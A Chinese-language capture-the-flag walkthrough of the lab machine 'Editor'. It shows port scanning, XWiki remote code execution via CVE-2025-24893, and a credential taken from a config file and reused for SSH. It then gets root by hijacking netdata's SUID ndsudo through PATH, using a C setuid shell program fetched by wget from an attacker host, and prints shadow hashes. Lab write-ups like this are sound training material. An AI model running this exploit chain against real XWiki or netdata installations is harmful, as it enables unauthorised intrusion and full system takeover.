基本信息

端口扫描

22,80,8080:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
$ nmap -sC -sV -Pn 10.10.11.80
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-09 13:27 JST
Nmap scan report for 10.10.11.80
Host is up (0.18s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT     STATE SERVICE          VERSION
22/tcp   open  ssh              OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp   open  http             nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://editor.htb/
8080/tcp open  http             Jetty 10.0.20
| http-robots.txt: 50 disallowed entries (15 shown)
| /xwiki/bin/viewattachrev/ /xwiki/bin/viewrev/
| /xwiki/bin/pdf/ /xwiki/bin/edit/ /xwiki/bin/create/
| /xwiki/bin/inline/ /xwiki/bin/preview/ /xwiki/bin/save/
| /xwiki/bin/saveandcontinue/ /xwiki/bin/rollback/ /xwiki/bin/deleteversions/
| /xwiki/bin/cancel/ /xwiki/bin/delete/ /xwiki/bin/deletespace/
|_/xwiki/bin/undelete/
|_http-server-header: Jetty(10.0.20)
| http-methods:
|_  Potentially risky methods: PROPFIND LOCK UNLOCK
| http-title: XWiki - Main - Intro
|_Requested resource was http://10.10.11.80:8080/xwiki/bin/view/Main/
| http-cookie-flags:
|   /:
|     JSESSIONID:
|_      httponly flag not set
|_http-open-proxy: Proxy might be redirecting requests
| http-webdav-scan:
|   WebDAV type: Unknown
|   Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, LOCK, UNLOCK
|_  Server Type: Jetty(10.0.20)
8081/tcp open  blackice-icecap?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 147.59 seconds

80

需要加hosts:

1
10.10.11.80 editor.htb

一个editor相关网站:

8080

是Xwiki,80那边的doc也是跳转到wiki.editor.htb:

xwiki

CVE-2025-24893

搜索可以找到xwiki相关漏洞:

exp需要稍微改一下,第35行,不然无限重定向::

1
exploit_path = f"/xwiki/bin/get/Main/SolrSearch?media=rss&text={encoded_payload}"

shell

这个更方便

  • GitHub - Infinit3i/CVE-2025-24893: PoC exploits CVE-2025-24893 , a remote code execution (RCE) vulnerability in XWiki caused by improper sandboxing in Groovy macros rendered asynchronously. It allows arbitrary command execution through injection into RSS-based SolrSearch endpoints.
    https://github.com/Infinit3i/CVE-2025-24893

打到xwiki shell:

info

常规翻配置文件得到一个密码:

1
2
3
xwiki@editor:/etc/xwiki$ cat ./hibernate.cfg.xml

<property name="hibernate.connection.password">theEd1t0rTeam99</property>

user flag

得到的密码就是用户ssh密码:

提权信息

常规枚举发现一些netdata相关的设置了suid,其中有ndsudo:

搜索可以找到相关漏洞:

就是ndsudo执行其他命令时,从环境变量中获取,导致可以劫持

提权 & root flag

所以就是自己准备一个elf文件,劫持环境变量执行其他命令:

1
2
3
4
5
x86_64-linux-gnu-gcc -o nvme nvme.c -static

wget http://10.10.14.5:7777/nvme
chmod +x nvme
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list

nvme.c

1
2
3
4
5
6
7
8
9
10
11
12
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {

	setuid(0);
	setgid(0);
	execl("/bin/bash", "bash", "-p", NULL);

	return 0;
}

shadow

1
2
root:$y$j9T$l1.MaTIpHzTAduIC4EoaA/$rNvK9Vq.iBxZ3BXRP4SM2CtSkVYdVnr5XrWQvMzLx99:20258:0:99999:7:::
oliver:$y$j9T$ktpLdRnocjXX8B2lat/6g.$/RNnDVRsMc0KybbsLVuJhxX9FgtjNMmPqvdYRaHOqu/:20258:0:99999:7:::

参考资料